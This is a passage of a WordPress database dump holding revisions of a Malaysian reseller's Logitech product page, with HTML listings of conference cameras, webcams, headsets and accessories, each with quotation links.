sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-meetup/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-connect/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-bcc950/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-ptz-pro-2/\" role=\"button\">\n						View\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BRIO</h3><p>4K Ultra HD webcam with RightLightâ„¢ 3 with HDR</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C930e</h3><p>Business webcam with a wide field of view and HD digital zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C925e</h3><p>Affordable 1080p HD webcam with integrated privacy shade</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech B525</h3><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>HEADSETS</h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech H570e Headset</h3><p>Comfortable, affordable, and built to last</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<h2>VIDEO COLLABORATION ACCESSORIES</h2>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>SMARTDOCK EXTENDER BOX</h3><p>Connectivity options for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech Screen Share</h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP EXPANSION MICS</h3><p>Add-on mics for larger groups</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech SmartDock Flex</h3><p>Expansion Kit for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 15M EXTENDED CABLE</h3><p>15 meter cable for video conferences in larger rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 10M EXTENDED CABLE</h3><p>10 meter cable, ideal for large conference rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>EXPANSION MIC FOR MEETUP</h3><p>Add-on microphone for huddle room flexibility</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-03-04 14:58:31','2019-03-04 06:58:31','',16,'https://bintara.com.my/blog/2019/03/04/16-revision-v1/',0,'revision','',0),(2986,1,'2019-03-04 15:01:31','2019-03-04 07:01:31','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-meetup/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-connect/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-bcc950/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-ptz-pro-2/\" role=\"button\">\n						View\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally-camera/\" role=\"button\">\n						View\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BRIO</h3><p>4K Ultra HD webcam with RightLightâ„¢ 3 with HDR</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C930e</h3><p>Business webcam with a wide field of view and HD digital zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C925e</h3><p>Affordable 1080p HD webcam with integrated privacy shade</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech B525</h3><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>HEADSETS</h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech H570e Headset</h3><p>Comfortable, affordable, and built to last</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<h2>VIDEO COLLABORATION ACCESSORIES</h2>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>SMARTDOCK EXTENDER BOX</h3><p>Connectivity options for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech Screen Share</h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP EXPANSION MICS</h3><p>Add-on mics for larger groups</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech SmartDock Flex</h3><p>Expansion Kit for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 15M EXTENDED CABLE</h3><p>15 meter cable for video conferences in larger rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 10M EXTENDED CABLE</h3><p>10 meter cable, ideal for large conference rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>EXPANSION MIC FOR MEETUP</h3><p>Add-on microphone for huddle room flexibility</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-03-04 15:01:31','2019-03-04 07:01:31','',16,'https://bintara.com.my/blog/2019/03/04/16-revision-v1/',0,'revision','',0),(2987,1,'2019-03-04 16:03:08','2019-03-04 08:03:08','<h2>LOGITECH BRIO</h2><p>Ultra HD Webcam for Video Conferencing, Streaming, and Recording</p><ul><li>Spectacular video quality up to 4K</li><li>Look great in any light with HDR and RightLightâ„¢ 3</li><li>Enhanced security with Windows Helloâ„¢</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>A NEW BENCHMARK FOR WEBCAMS</h2><p>Step up to the worldâ€™s most technologically advanced webcam and get professional-quality video for video conferencing, streaming, or recording. Logitech BRIO is packed with features that produce stunning video in any environment. Our premier 4K ultra high-def camera offers 5x digital zoom, high frame rates, outstanding low-light performance, HDR, and RightLightâ„¢ 3.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/briopictograms-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>CAPTURE EVERY DETAIL IN 4K HD</h3><p>Stream crystal-clear video with superb resolution, frame rate, color, and detail. Logitech BRIO delivers 4K Ultra HD at 30 fps or 1080p at either 30 or an ultra-smooth 60 fps for outstanding clarity, smoothness, and detail. Get a closer look with 5x 